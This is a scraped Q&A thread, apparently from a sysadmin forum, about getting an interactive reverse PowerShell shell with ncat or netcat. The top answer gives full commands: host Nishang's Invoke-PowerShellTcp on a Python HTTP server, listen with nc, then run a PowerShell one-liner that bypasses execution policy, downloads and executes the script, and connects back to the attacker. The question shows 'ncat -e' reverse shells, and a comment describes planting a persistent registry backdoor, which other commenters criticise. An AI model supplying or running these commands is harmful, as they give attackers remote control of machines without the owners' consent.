How to execute a reverse "Powershell shell" using ncat or netcat?
The reason that the Powershell hangs on the reverse shell of your attacking machine might be due to it not being fully interactive. Try to use PowerShell-based shells like Nishang's Invoke-PowerShellTcp. Download the .ps1 script on your attacking machine, run a HTTP server for the remote host to download the script from, then download it on the remote machine.
Setting up an HTTP server on your attacking machine using either Python 2 or Python 3
python -m SimpleHTTPServer [port]
python3 -m http.server [port]
Also on your attacking machine, run a netcat listener:
nc -lnvp [port2]
Then run this on the Command Prompt (cmd) of the remote machine
powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://[your attacking machine's IP address]:[port1]/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress [your attacking machine's IP address] -Port [port2]"
The caught reverse shell on your netcat should now be fully interactive.
Related videos on Youtube
samsam
Updated on September 18, 2022Comments
-
samsam over 1 year
I am using ncat to execute a reverse "cmd" shell from one machine to another and without any issues using the commands:
In my machine: ncat -l 443 In the remote machine: ncat <my ip> 443 -e cmd
And all works flawlessly, however, I would very much prefer "powershell" to be executed instead of "cmd", for that I did this:
In my machine: ncat -l 443 In the remote machine: ncat <my ip> 443 -e powershell
But now a strange thing happens, the powershell prompt is given to the remote machine and not mine... This is the output:
In my machine: Windows Powershell Copyright 2009 Microsoft Corporation. All rights reserverd. (and it hangs there) In the remote machine: PS C:\Users\User> (the shell is actually given to the remote machine)
Is there a way to redirect that prompt to my machine again, and have the "powershell" shell in my machine as I did with the "cmd" shell? I searched for stdout redirection but could not make it work :(
Any help would be very much appreciated.
-
samsam about 10 yearsI would like to have a persistent connection to a remote server in case of an emergency. For that I will place a .bat file in HKLM with the content: ncat <my ip> 443 -e powershell. And then set a password to that connection so not anyone can use it, but for now I would be very happy if I could just have the reverse powershell shell working =P
-
mfinni about 10 yearsYou're still not answering my question - what problem are you trying to solve? "in an emergency" doesn't tell me anything, because the circumstances in which this would work but PS Remoting wouldn't, are eluding me.
-
samsam about 10 yearsPlease correct me if I am wrong but if I use PS Remoting I will have to create a direct connection to the remote machine, and most firewalls could deny access. That is way I would prefer to have a reverse Powershell connection using ncat.
-
mfinni about 10 yearsThis isn't very professional. You're allowing plaintext over the internet, using port 443 so it superficially looks like HTTPS, to traverse firewalls without the permission of the firewall owner? Because if you had permission, you could get remote access properly. If you were doing this to admin my servers, you wouldn't be working for me anymore. If I'm misunderstanding you, please do let me know.
-
samsam about 10 years:( Take it easy man I am also asking this just for the curiosity and the knowledge. The reason why cmd works but powershell doesn't is intriguing me. I am sure it has to with some stdout/input redirection but the way to make it work is for now sadly beyond my knowledge.
-
mfinni about 10 yearsYou've read the Help link, right? This site is intended for professional systems administrators doing work on production systems. You're trying to solve a problem that would make most sysadmins say "Please slow down and start from the top." I agree that the question you're asking is good for curiosity, and I'd even like to know the answer, but it's an inappropriate method of remote access for production systems.
-
Michael Hampton about 10 yearsIf you have the authorization to make a persistent connection to the server, then you should be able to use PS remoting anyway.
-
Krypton about 6 yearsany news on this? I tried with nc, the session was opened. But the shell just hang there without returning any output after I entered a command.
-
-
Massimo about 8 yearsPlease don't post link-only answers.
-
Castaglia about 8 yearsYes, link-only answers are low quality, since links can change/go stale/dead, and thus future readers would not be able to learn from your solution. Please edit your post to include the relevant details/code directly.